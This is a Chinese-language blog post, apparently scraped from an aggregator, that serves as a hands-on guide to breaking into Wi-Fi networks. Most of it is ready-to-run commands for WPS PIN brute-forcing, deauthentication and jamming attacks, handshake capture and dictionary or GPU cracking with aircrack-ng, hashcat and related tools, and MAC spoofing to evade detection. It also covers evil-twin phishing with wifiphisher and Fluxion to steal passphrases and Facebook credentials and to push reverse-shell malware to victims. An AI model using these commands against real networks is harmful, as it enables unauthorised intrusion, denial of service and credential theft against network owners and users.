一些Wifi破解姿式

wlan0:無線網卡設備php

BSSID/AP's MAC:目標路由器的mac地址html

Client's MAC:鏈接到此wifi客戶端的mac地址python

ESSID:這個無線的名字linux

大體思路:git

獲取bssid和essid   airodump命令
探測是否開啓wps    airodump-ng MB,wash -i mon0 -C
探測pin         reaver -i mon0 -b ap_bssid -vv
ddos攻擊       mdk3 a mon0 -a bssid -c
相關閱讀:http://www.mottoin.com/91376.html

 

    CH[X] 掃描的信道號,由於airodump是跳頻掃描的,會一直掃描13個信道。後面是你的掃描時間和你本地時間。
    BSSID:路由器MAC地址
    PWR:網卡的信號水平,新號越好數值越大,可是例如第一個出現‘-1’說明該客戶端不在個人監聽範圍內。
    Beacons:就是Beacon數據的速率
    #Date:被捕獲的數據分組數量
    #/S :十秒內的捕獲數據分組量
    CH:信道號,是從beacon包裏面獲取的(在企業無線滲透中提到過beacon內容)
    MB:是一直支持速率,關於802.11標準的,不過通常是用來看是否開啓wps的,通常狀況下54e.後面有.的都是開啓的,可是也不徹底。
    ENC:(Encryption )所使用的加密算法體系。Open=無加密,WPA=WPA/WPA2=WPA2
    CIPHER:加密算法,如CCMP,TKIP….
    Auth:(Authentiction)認證協議:如:PSK:(PWA/WPA2的預共享密鑰)或是OPEN(WEP開放)MGT(則是802.1x、eap、radius)由於MGT是獨立認證服務器
    ESSID:就是SSID
    Station:客戶端MAC
    Notassociated:就是證實客戶端沒跟AP連上。Associated認證在上一篇文章提到過。
    Lost:是10秒丟包數據
    Rate:傳輸速率
    Probe:就是一個client試圖去連目標AP但沒連上
    Frame:通訊幀數

 

相關命令

無線網卡開啓混雜模式
  ifconfig wlan0 down
  iwconfig wlan0 mode monitor
  ifconfig wlan0 upgithub

  從混雜模式中恢復
  ifconfig wlan0 down
  iwconfig wlan0 mode managed
  ifconfig wlan0 up算法

附:有線網卡開啓混雜模式shell

  ifconfig eth0 promisc 設置網卡爲混雜模式
  ifconfig eth0 -promisc 從混雜模式中恢復npm

重啓網卡的命令api

  service network-manager restart

  (/etc/init.d/network-manager restart

  sudo systemctl restart NetworkManager)

  service networking restart

保護措施
macchanger -s  [網卡]             #查看網卡當前的MAC
macchanger -m 想僞造的MAC 網卡         #僞造MAC
macchanger  -A  wlan0                 #修改網卡mac地址爲隨機地址

vi /etc/hostname  #修改主機名
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all  #防止ping

無線DOS aireplay
-ng -0 3 –a BSSID –c clientMAC wlan0 mdk3 mon0 a –a AP'MAC -s 80 mdk3 mon0 d -c 信道 #攻擊client MAC mdk3 mon0 b –g –c 11 –h 7     #發動虛假AP信號進行干擾 mdk3 mon0 b –n ESSID –g –c 11  #對指定名稱(ESSID)發送干擾,-g是假裝爲54M的標準的802.11無線網絡,-c頻道

 

Wifi破解

 一. Pin碼破解


無線網卡開啓混雜模式   
ifconfig wlan0 down   iwconfig wlan0 mode monitor   ifconfig wlan0 up
掃描開啓wps的AP
  wash -i wlan0  
這裏須要強調一下,網上不少教程裏都有-C這個優化參數,當初寫這篇博文的時候也有這個參數,不過新版本的wash已經再也不支持,感謝Demon先生的友情提醒。

破解ping碼
  reaver
-i 混雜網卡名 -c 信道 -b AP'MAC -a -S -vv -d 9 -t 9 (混雜模式使用) 目標信號很好: reaver -i wlan0 -b MAC -a -S -vv -d0 -c 1 目標信號普通: reaver -i wlan0 -b MAC -a -S -vv -d2 -t 5 -c 1 目標信號通常: reaver -i wlan0 -b MAC -a -S -vv -d5 -c 1

經過pin碼直接獲取路由器密碼
  reaver -i 混雜網卡名 -b MAC -p PIN8位數

 


 

二. 暴力破解

使用經典的Aircrack-ng

WPA/WPA2
(1)無線網卡開啓混雜監聽模式   
ifconfig wlan0 down      iwconfig wlan0 mode monitor   ifconfig wlan0 up     --> wlan0

  或者:
  airmon-ng start wlan0  --> wlan0mon
  若是不行:
  airmon-ng check kill
  airmon-ng start wlan0
(2)探測無線網絡
  airodump-ng wlan0mon   airodump-ng -c 信道 -w 保存的數據包名 –-bssid AP’MAC wlan0mon
  例:
  airodump-ng -c 6 --bssid 69:71:5E:51:38:EE -w /home/OKing/wifi/FAST_33687 wlan0mon
(3)強制解除客戶端認證
  aireplay-ng -0 攻擊次數 -a AP’MAC [-c 客戶端MAC] [-e bssid] wlan0mon [--ignore-negative-one]
  例:
    aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D -e FAST_33687 wlan0mon
    若是信道里有-1,則須要 --ignore-negative-one 參數    
    aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D -e "My WiFi" wlan0mon --ignore-negative-one
  在沒有客戶端鏈接的狀況下,可以使用假身份認證攻擊(模擬用戶認證鏈接,攻擊這個模擬用戶)
  aireplay-ng  --fakeauth  -q 10  -a AP'MAC  -h 模擬用戶的MAC
  aireplay-ng  --arpreplay  -b AP'MAC  -h  模擬用戶的MACs

(4)密碼破解
  aircrack-ng 數據包名.cap –w 字典路徑   airdecap-ng -l -e bssid –p 密碼數據包名.cap //破解出密碼後,解析加密內容 WEP (1)airmon-ng start wlan0 [信道] 或 airmon-ng check kill airmon-g start wlan0
   啓動監聽後的混雜模式網卡: wlan0mon (
2)airodump-ng wlan0mon0 (3)airodump-ng -c 信道 -w 數據包名 [--bssid AP’MAC] --ivs wlan0mon0 (4)aireplay-ng -3 -b AP’MAC -h客戶端MAC [-x 1024(每秒發送包數量)] wlan0mon0 (5) aircrack-ng 數據包名.ivs –w 字典路徑 (解密的報文ivs要20000以上) (6) aircrack-ng -x -f 2 包名.ivs -x 暴力破解 -f 2 複雜度爲2    airdecap-ng –w 解密前的祕鑰 數據包名.ivs 如:KEY FOUND! [31:32:33:34:35:36:37:38:39:30:61:61:61] (ASCII:1234560aaa) //藍色部分是解密前的密鑰

wesside –v AP’MAC –k 1(重發數據包次數) –i mon0 //aircrack-ng套件中的自動化破解weo加密wifi工具,但成功率較低
tkiptun
-ng –a AP’MAC -h 客戶端MAC 網卡   //aircrack-ng套件中的自動化破解wpa/wpa2加密wifi的工具(可加參數:-m 最小數據包長度 -n 最大數據包長度)
 
 

輔助命令

airdecloack-ng  --bssid AP’MAC  --filters signal –i 包名.cap #過濾出指定AP報文數據(會生成*.pcap的報文)
ivstools  --convert  a.cap  b.ivs    //將cap數據包轉換成ivs數據包
ivstools  --merge  a.ivs  b.ivs  ab.ivs     //將數據包過濾合併
 
 
握手包破解命令 
john --wordlist=password.lst --rules --stdout | aircrack-ng -e essid -w - xxx.cap 
使用john在字典上執行排列匹配,將各類組合詞提供給aircrack-ng破解使用 

pyrit -r xxx.cap -i password.lst attack_passthrough GPU加速破解 (time 程序/命令名 #計算程序執行時間) 

cowpatty -s ESSID -r xxx.cap -d /path/彩虹表路徑 (若SSID中包含空格,要用引號) 

爲cowpatty破解制做專用hash tables : 
  genpmk -f 字典 -d 要生成的hash table -s ssid 
不少組織都本身創建了wpa table庫,也就是預先使用常見的essid生成hash table
若是要破解essid相同的無線密碼,直接網上下載,無需本身再生成
國內比較有名的就是ZerOne團隊針對國內常見essid生成的hash table

如今有不少調用aircrack-ng套件自動化抓包破解的項目,能夠去github上瞧瞧。

 

命令行下wifi自動化破解工具

它會根據目標路由器,自動選擇合適的破解方式,好比pin碼破解,抓包暴力破解等

(1)開啓無線網卡監聽模式
  ifconfig wlan1 down
  iwconfig wlan1 mode monitor
  ifconfig wlan1 up
  或者: airmon-ng start wlan1

(2)啓動wifite,此時會自動加載混雜模式下的網卡,探測無線網絡
    
  
   Ctrl + C 中止探測,儘可能選擇有client的無線進行破解。或者添"all"破解全部
    

(3)等待破解結果便可...

 

Fern-wifi-cracker

 一個強大的圖形化工具,傻瓜式,使用方便

破解方式再也不介紹,網上比較多。

在ToolBox工具箱中還有一些不錯輔助小工具

輔助命令

wpaclean out.cap in.cap             //整理包文件內容,保證它的格式內容與密碼破解程序兼容
aircrack-ng out.cap -J out.hccap        //要把cap數據包轉換成hccap數據包才能用oclHashcat破解
cudaHashcat-plus64.exe -m 2500 out.hccap   //破解WPAv2哈希

 

針對暴力破解,有一個能夠在線破解握手包的站點 https://gpuhash.me/,可是複雜的密碼是要付費的

添加一個任務,上傳握手包

 

 

 

釣魚欺騙獲取wifi密碼

wififisher

項目地址: https://github.com/sophron/wifiphisher

簡介:

  WifiPhisher使用相似「邪惡雙胞胎」的攻擊手法,首先創建一個冒充合法無線訪問點的虛假訪問點,

  而後對合法訪問訪問點發起拒絕服務攻擊,或是在其周圍創建無線信號干涉,以切斷用戶與合法訪問點的鏈接,迫使用戶設備自動鏈接攻擊者僞造的虛假訪問點

  當受害者鏈接到僞造的AP後,會被強制重定向到一個僞造的路由器配置界面,提示路由器固件更新需從新認證密碼……

  工具裏提供了許多型號路由器的僞造頁面適合更多場景,使用時候須要兩個無線網卡

安裝:sudo python setup.py install

安裝依賴 PyRIC-0.1.6.2 的時候卡住了,本身翻Q下載的

https://pypi.python.org/packages/ae/d3/933690b57767006c11ea4b68bf72dd91511fc20b19fe655f49c145392ec2/PyRIC-0.1.6.2.tar.gz#md5=b26291a5e23fd733dbd2bafe602e4ddb
cd PyRIC-0.1.6.2
sudo python setup.py install
參數 -m   最大|選擇要取消受權的客戶端的最大數量。客戶列表將被清空,並在達到限制後從新填充。示例:-m 5
 -n    noupdate |當達到最大(-m)個客戶端/ AP組合數時,不要清除解除列表。必須與-m一塊兒使用。示例:-m 10 -n 
 -t   時間間隔|選擇發送報文的時間間隔。默認值儘量快。若是看到scapy錯誤,如"no buffer space",請嘗試:-t .00001 
 -p    選擇在每一個解擾脈衝串中要發送的數據包數量。默認值爲1; 1分組到客戶端,1個分組到AP。向客戶端和AP同時發送2個deauth數據包:-p 2
 -d   跳過去認證分組到接入點的廣播地址,而且只將它們發送到客戶端/ AP對
 -a   輸入要定向的特定接入點的MAC地址
 -jI  干擾接口。默認狀況下,腳本會找到最強大的接口並開始監視模式。
 -aI  apinterface |選擇僞接口的接口。默認狀況下,腳本會找到第二大功能的接口並啓動監視模式。 

幾種欺騙模式:

1 - 網絡管理器鏈接
模仿網絡管理器的行爲。 此模板顯示Chrome的「鏈接失敗」頁面,並經過要求預共享密鑰的頁面顯示網絡管理器窗口。 目前,支持Windows和MAC OS的網絡管理器。

2 - 固件升級頁面
因爲固件升級,沒有標識或品牌要求WPA / WPA2密碼的路由器配置頁。 適合移動設備。

3 - 瀏覽器插件更新
通用瀏覽器插件更新頁面,可用於向受害者提供有效負載。

4 - OAuth登陸頁面
免費Wi-Fi服務要求Facebook憑據使用OAuth進行身份驗證

用法

經過鍵入`wifiphisher`或`python bin / wifiphisher`(從工具目錄中)運行該工具。

經過運行沒有任何選項的工具,它將找到正確的接口,並交互地要求用戶選擇目標網絡的ESSID,以及要執行的網絡釣魚場景。

******

wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgrade

使用wlan0生成流氓接入點和wlan4 DoS攻擊。從列表中手動選擇目標網絡,而後執行「固件升級」方案。用於手動選擇無線適配器。 「Firware升級」方案是從密碼保護網絡獲取PSK的簡單方法。

****** 

wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd

自動選擇正確的接口。使用ESSID「CONFERENCE_WIFI」定位Wi-Fi並執行「插件更新」方案。 Evil Twin將使用PSK「s3cr3tp4ssw0rd」進行密碼保護。

對於具備公開的PSK的網絡有用(例如在會議中)。

「插件更新」方案爲受害者下載惡意可執行文件(例如包含反向shell有效內容的惡意軟件)提供了一種簡單的方法。

******
wifiphisher --nojamming --essid "FREE WI-FI" -p oauth-login
```
不要定位任何網絡。只需生成一個開放的Wi-Fi網絡,使用ESSID ""FREE WI-FI" ,並執行「OAuth登陸」方案。
對公共區域的受害者有幫助。 「OAuth登陸」方案提供了一種從社交網絡(如Facebook)捕獲憑據的簡單方法。

 *****

遇到端口被佔用的狀況

查看端口被哪一個進程佔用
  (1)netstat -pan | grep 端口
  (2)fuser -v -n tcp 端口號
  (3)lsof -i:端口號
殺死進程  
  killall 進程名稱

  kill -9 進程id  

 

Fluxion

原理與上面的wifiphisher差很少,也是創建僞AP以後強行攻擊是合法客戶端,迫使其鏈接到僞造的AP上,而後彈出提示框,要求從新認證wifi密碼

安裝時會遇到沒法安裝php5-cgi的問題,由於新版本已再也不支持,kali上能夠安裝php-cgi替代。

另外,有deb安裝包:https://sourceforge.net/projects/wififluxion/files/Fluxion_0.23_all.deb/download

使用過程步驟清晰簡單

效果:

 

GUI界面

Fluxion GUI

 

目前最新版fluxion也添加許多假裝頁面,再也不是之前簡單的彈框了,如路由器固件升級等。。。

 

kali支持的無線網卡

http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html

https://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=ha1cljqc5mnki5hpvmhv1tkfm0#compatibility

 

相似內容:

實戰演練之Evil Twin攻擊

 

兩個不錯的小工具

LinSSID:一款Linux下的圖形化Wi-Fi掃描器

waidps :開源無線WiFi入侵檢測&防禦系統

相關文章
相關標籤/搜索